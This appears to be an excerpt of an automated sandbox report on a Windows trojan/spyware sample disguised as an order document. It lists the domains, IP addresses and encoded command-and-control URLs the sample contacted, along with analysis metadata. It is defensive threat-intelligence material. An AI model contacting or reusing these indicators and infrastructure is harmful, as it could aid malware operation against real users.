            http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)0%Avira URL Cloudsafe
            http://www.hellokong.xyz/oui5/?OdjTHtuX=SBbMJInblZiNUqJtj2t3oAZeaf7w1Mr63FaPzYR5npk3jTg+edZF9NME4tF9tViJCHx7c4tSq6N/qcOwzg98IChDG2ekcZOWcYJRK2znKimA3GQ/fbvAwxxdlKlVh8HBUwdv3Sg=&Y6vp=3PLd8j0%Avira URL Cloudsafe
            https://www.fondazionegtech.org/jmiz/?OdjTHtuX=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWK0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot100%Avira URL Cloudmalware
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
            http://www.3cubesinterior.in/n8zi/?Y6vp=3PLd8j&OdjTHtuX=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw=0%Avira URL Cloudsafe
            http://www.mengistiebethlehem.com/92z0/0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff0%Avira URL Cloudsafe
            http://3cubesinterior.in/n8zi/?Y6vp=3PLd8j&OdjTHtuX=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTX0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/pics/29590/bg1.png)0%Avira URL Cloudsafe
            https://www.sedo.com/services/parking.php30%Avira URL Cloudsafe
            http://www.mengistiebethlehem.com/Lehigh_Valley.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2F0%Avira URL Cloudsafe
            http://www.hondamechanic.today0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf0%Avira URL Cloudsafe
            http://www.ad14.fun/oc7s/?Y6vp=3PLd8j&OdjTHtuX=ITz00edB1Uq7JDbRPTK5B57t89T2WQZ+hnFFsCQVLpiDf2LeJizgG+jH2jz5I+TBlRR/yAoHWWMQTB4d0WCMdZHpvgPMtRMFWqdBjyYGuisLgsnAd4XsPoSnl82L2CWvs48fsL0=0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold0%Avira URL Cloudsafe
            http://www.hondamechanic.today/pv57/?OdjTHtuX=6UcJOPuI3ds3m8dRFaGqe18kk0aRE6C9zfep+6iQQcPKXv8sEJKo1I2dFrwlAwFzKSJLgqMZnt8gW4RLGDqdj2op7I/d7Qwx4DLM/Sb7UzOzABLy3akf6gQBeurdxZRPhPoEffE=&Y6vp=3PLd8j0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
            https://img.sedoparking.com/templates/images/hero_nc.svg0%Avira URL Cloudsafe
            http://www.easybackpage.net/3jr0/0%Avira URL Cloudsafe
            http://www.ad14.fun/oc7s/0%Avira URL Cloudsafe
            http://www.artvectorcraft.store/s0j2/0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.rz6grmvv.shop
            		121.254.178.230
            		truefalse
              		unknown
              ghs.google.com
              		142.250.74.211
              		truefalse
                		unknown
                superunicornpalace.com
                		144.208.124.10
                		truefalse
                  		unknown
                  www.architect-usschool.com
                  		217.160.0.84
                  		truefalse
                    		unknown
                    parkingpage.namecheap.com
                    		91.195.240.19
                    		truefalse
                      		unknown
                      www.hondamechanic.today
                      		64.190.62.22
                      		truefalse
                        		unknown
                        www.mengistiebethlehem.com
                        		208.91.197.13
                        		truefalse
                          		unknown
                          www.ad14.fun
                          		188.114.96.3
                          		truefalse
                            		unknown
                            epicbazaarhub.com
                            		192.185.208.8
                            		truefalse
                              		unknown
                              sitestudio.it
                              		89.31.76.10
                              		truefalse
                                		unknown
                                www.tedjp-x.com
                                		162.43.101.114
                                		truefalse
                                  		unknown
                                  www.hellokong.xyz
                                  		203.161.49.220
                                  		truetrue
                                    		unknown
                                    3cubesinterior.in
                                    		45.113.122.18
                                    		truefalse
                                      		unknown
                                      www.3cubesinterior.in
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.fondazionegtech.org
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.macklaer.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.easybackpage.net
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.epicbazaarhub.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.superunicornpalace.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.artvectorcraft.store
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.hellokong.xyz/oui5/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.architect-usschool.com/s24g/true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.artvectorcraft.store/s0j2/?OdjTHtuX=BcB93STIeRzesDqYzmgjF/8Aqg2qoGbugvfC7gVQd0Epq+RTfyEF6eLz+ZShIqPWgjFYuR+pkePM3whd8giEyH2988JCuLY+vIFLWxAqbBoWpgzIu1DPnhlaAUBnkOtEvd711RA=&Y6vp=3PLd8jfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.epicbazaarhub.com/2769/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.hondamechanic.today/pv57/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.architect-usschool.com/s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM=true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.tedjp-x.com/rxdf/?OdjTHtuX=n5pckC1kDFTF1S5BKIsmiJ5ryDhRlCYaQVQlc2liktwXiyajKP48Wkncu6FoMqtxFtMv+2TSpEcAsDV+dI8BV0td651LvJeUOcJvnAipjtqBUQAoEW2kSo5oIr+iYWP+5LowsUg=&Y6vp=3PLd8jfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tedjp-x.com/rxdf/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.rz6grmvv.shop/wvam/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.fondazionegtech.org/jmiz/?Y6vp=3PLd8j&OdjTHtuX=FlIs+r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p/5DHHhHlE1nDIZgKO5qXvVh1+gwmyYcA+2CCaGrmZckpjuvJQ96WUy8TtzIG0Do=false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.3cubesinterior.in/n8zi/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mengistiebethlehem.com/92z0/?OdjTHtuX=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Y6vp=3PLd8jfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.superunicornpalace.com/mwa4/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.rz6grmvv.shop/wvam/?Y6vp=3PLd8j&OdjTHtuX=ppN4Kg7gaCRo+jf4iLEmna60kcJd+oo7/wZIRMT4+Man5OlGV28GmQNPMVld/mi8klF/kBnYjgc4RUC2chY7WuIAYm4xk+Ll6sKGI2rWgbxJmoqgO5rVx7RJwqzCMQvvfrLjQU4=false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.easybackpage.net/3jr0/?OdjTHtuX=C6nbN3Z6SrmD48dKFL5Pdr+cZFmYp1QsQ3e628IyGZcRZCB2vhKb6ox4g6I37OYbmAVSFMbRXnVDWcusSAPk0vfQfIagm0ASlZK02lSA38wn9PDfH1oUKWJrxTMbBcOAU+1qziI=&Y6vp=3PLd8jfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.hellokong.xyz/oui5/?OdjTHtuX=SBbMJInblZiNUqJtj2t3oAZeaf7w1Mr63FaPzYR5npk3jTg+edZF9NME4tF9tViJCHx7c4tSq6N/qcOwzg98IChDG2ekcZOWcYJRK2znKimA3GQ/fbvAwxxdlKlVh8HBUwdv3Sg=&Y6vp=3PLd8jfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.3cubesinterior.in/n8zi/?Y6vp=3PLd8j&OdjTHtuX=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw=false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mengistiebethlehem.com/92z0/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.ad14.fun/oc7s/?Y6vp=3PLd8j&OdjTHtuX=ITz00edB1Uq7JDbRPTK5B57t89T2WQZ+hnFFsCQVLpiDf2LeJizgG+jH2jz5I+TBlRR/yAoHWWMQTB4d0WCMdZHpvgPMtRMFWqdBjyYGuisLgsnAd4XsPoSnl82L2CWvs48fsL0=false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.hondamechanic.today/pv57/?OdjTHtuX=6UcJOPuI3ds3m8dRFaGqe18kk0aRE6C9zfep+6iQQcPKXv8sEJKo1I2dFrwlAwFzKSJLgqMZnt8gW4RLGDqdj2op7I/d7Qwx4DLM/Sb7UzOzABLy3akf6gQBeurdxZRPhPoEffE=&Y6vp=3PLd8jfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.easybackpage.net/3jr0/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.artvectorcraft.store/s0j2/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.ad14.fun/oc7s/false
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://duckduckgo.com/chrome_newtabcompact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://architect-usschool.com/s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwDcompact.exe, 0000000A.00000002.4574298276.0000000004950000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.00000000036E0000.00000004.00000001.00040000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://duckduckgo.com/ac/?q=compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://searchdiscovered.com/__media__/images/logo.gif)compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.consentmanager.netcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://i2.cdn-image.com/__media__/pics/28903/search.png)compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		unknown
                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://epicbazaarhub.com/2769/?OdjTHtuX=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4compact.exe, 0000000A.00000002.4574298276.000000000449A000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.000000000322A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.namecheap.com/domains/registration/results/?domain=easybackpage.netcompact.exe, 0000000A.00000002.4574298276.0000000004AE2000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000A.00000002.4577738363.0000000006460000.00000004.00000800.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003872000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.mengistiebethlehem.com/Moravia.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2FFitbFccompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcompact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.mengistiebethlehem.com/display.cfmcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000A.00000002.4577738363.0000000006460000.00000004.00000800.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://hao7.vipcompact.exe, 0000000A.00000002.4574298276.0000000004308000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003098000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameArt_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2120287530.0000000002953000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.mengistiebethlehem.com/Christmas_City_Studio.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbecompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://delivery.consentmanager.netcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://support.hostgator.com/compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.fondazionegtech.org/jmiz/?OdjTHtuX=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKfirefox.exe, 0000000E.00000002.2790664074.00000000256C4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.ecosia.org/newtab/compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://3cubesinterior.in/n8zi/?Y6vp=3PLd8j&OdjTHtuX=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXcompact.exe, 0000000A.00000002.4574298276.0000000004F98000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003D28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.sedo.com/services/parking.php3EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003872000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://ac.ecosia.org/autocomplete?q=compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://i2.cdn-image.com/__media__/pics/29590/bg1.png)compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.mengistiebethlehem.com/Lehigh_Valley.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2Fcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000A.00000002.4577738363.0000000006460000.00000004.00000800.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.hondamechanic.todayEUSOiCcoIEEJJ.exe, 0000000D.00000002.4576370278.0000000004E30000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://img.sedoparking.com/templates/images/hero_nc.svgcompact.exe, 0000000A.00000002.4574298276.0000000004AE2000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000A.00000002.4577738363.0000000006460000.00000004.00000800.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003872000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://i2.cdn-image.com/__media__/js/min.js?v2.3compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      142.250.74.211
                                                      		ghs.google.comUnited States
                                                      		15169GOOGLEUSfalse
                                                      144.208.124.10
                                                      		superunicornpalace.comUnited States
                                                      		395092SHOCK-1USfalse
                                                      64.190.62.22
                                                      		www.hondamechanic.todayUnited States
                                                      		11696NBS11696USfalse
                                                      203.161.49.220
                                                      		www.hellokong.xyzMalaysia
                                                      		45899VNPT-AS-VNVNPTCorpVNtrue
                                                      208.91.197.13
                                                      		www.mengistiebethlehem.comVirgin Islands (BRITISH)
                                                      		40034CONFLUENCE-NETWORK-INCVGfalse
                                                      91.195.240.19
                                                      		parkingpage.namecheap.comGermany
                                                      		47846SEDO-ASDEfalse
                                                      162.43.101.114
                                                      		www.tedjp-x.comUnited States
                                                      		11333CYBERTRAILSUSfalse
                                                      217.160.0.84
                                                      		www.architect-usschool.comGermany
                                                      		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                      89.31.76.10
                                                      		sitestudio.itItaly
                                                      		24994GENESYS-ASITfalse
                                                      188.114.96.3
                                                      		www.ad14.funEuropean Union
                                                      		13335CLOUDFLARENETUSfalse
                                                      45.113.122.18
                                                      		3cubesinterior.inIndia
                                                      		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                      192.185.208.8
                                                      		epicbazaarhub.comUnited States
                                                      		46606UNIFIEDLAYER-AS-1USfalse
                                                      121.254.178.230
                                                      		www.rz6grmvv.shopKorea Republic of
                                                      		3786LGDACOMLGDACOMCorporationKRfalse

                                                      General Information

                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1467083
                                                      Start date and time:2024-07-03 17:54:53 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 11m 23s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:13
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@10/7@15/13
                                                      EGA Information:
                                                      • Successful, ratio: 75%
                                                      HCA Information:
                                                      • Successful, ratio: 93%
                                                      • Number of executed functions: 153
                                                      • Number of non-executed functions: 307
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target EUSOiCcoIEEJJ.exe, PID 2084 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
